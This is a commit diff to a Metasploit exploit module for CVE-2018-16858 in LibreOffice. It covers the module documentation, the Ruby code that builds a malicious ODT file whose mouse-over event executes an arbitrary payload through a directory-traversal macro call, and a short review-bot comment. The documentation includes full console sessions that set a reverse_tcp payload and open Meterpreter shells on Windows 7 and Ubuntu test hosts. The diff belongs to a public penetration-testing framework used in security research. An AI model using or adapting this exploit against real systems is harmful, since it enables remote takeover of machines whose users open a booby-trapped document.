added documentation and changes for module
parent
da0c0d7d3f
commit
8dc8a18d2b
|
@ -1,8 +1,8 @@
|
|||
## Description
|
||||
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
|
||||
Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
|
||||
lack of ability to pass arguments.
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
|
||||
Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
|
||||
this module due to the lack of ability to pass arguments.
|
||||
|
||||
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
|
||||
to them. A macro can be tied to a program event by including the script that contains the macro and the function
|
||||
|
@ -32,10 +32,66 @@
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Version of software and OS as applicable
|
||||
### Tested on LibreOffice 6.1.2.1 running Windows 7
|
||||
|
||||
```
|
||||
msf > use module_name
|
||||
msf auxiliary(module_name) > set POWERLEVEL >9000
|
||||
msf auxiliary(module_name) > exploit
|
||||
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
|
||||
|
||||
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.156
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-MGMN7ND70I1\a_user
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-MGMN7ND70I1
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x86/windows
|
||||
```
|
||||
|
||||
### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
|
||||
target => 1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
|
||||
|
||||
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set LHOST 192.168.37.1
|
||||
LHOST => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (985320 bytes) to 192.168.37.174
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.37.174
|
||||
OS : Ubuntu 18.04 (Linux 4.18.0-16-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
```
|
||||
|
|
|
@ -12,8 +12,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Placeholder',
|
||||
'Name' => 'LibreOffice Macro Code Execution',
|
||||
'Description' => %q{
|
||||
LibreOffice comes bundled with sample macros written in Python and
|
||||
allows the ability to bind program events to them. A macro can be tied
|
||||
to a program event by including the script that contains the macro and
|
||||
the function name to be executed. Additionally, a directory traversal
|
||||
vulnerability exists in the component that references the Python script
|
||||
to be executed. This allows a program event to execute functions from Python
|
||||
scripts relative to the path of the samples macros folder. The pydoc.py script
|
||||
included with LibreOffice contains the tempfilepager function that passes
|
||||
arguments to os.system, allowing RCE.
|
||||
|
||||
This module generates an ODT file with a mouse over event that
|
||||
when triggered, will execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -26,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'CVE', '2018-16858' ],
|
||||
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
|
||||
],
|
||||
'Platform' => [ 'win', 'linux' ],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
|
@ -42,18 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'CmdStagerFlavor' => [ 'printf' ]
|
||||
'CmdStagerFlavor' => 'printf'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => "Oct 18, 2018",
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'Output file name', 'librefile.fodt'])
|
||||
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -62,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
:remove_comspec => true,
|
||||
:method => 'reflection',
|
||||
:wrap_double_quotes => false,
|
||||
:encode_final_payload => true
|
||||
}
|
||||
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
|
||||
|
@ -70,13 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def gen_linux_cmd
|
||||
@cmd = generate_cmdstager
|
||||
@cmd = generate_cmdstager.first
|
||||
@cmd << ' && echo'
|
||||
end
|
||||
|
||||
def gen_file(path)
|
||||
text_content = Rex::Text.rand_text_alpha(10..15)
|
||||
|
||||
# file from Alex Inführ's PoC post referenced above
|
||||
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
|
||||
libre_file = ERB.new(fodt_file).result(binding())
|
||||
libre_file
|
||||
|
|
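Review bot: In `gen_file`, `text_content` is assigned but never used in the visible lines, so its only consumer can be the ERB template, which receives the whole module instance through `binding()`; nothing here tells a reader which names `librefile.erb` depends on. I would add a comment above the `ERB.new` call such as `# librefile.erb reads text_content and @cmd via this binding (confirm against the template)`, write the call as `ERB.new(fodt_file).result(binding)`, and return it directly instead of going through the `libre_file` temporary. The `path` argument is likewise not referenced in the lines shown; `gen_file` continues past the end of the hunk, so it may be used further down. Separately, the `'Description'` in `initialize` does not state the affected LibreOffice versions that the module documentation lists, which is the first thing someone scoping exposure to CVE-2018-16858 will look for.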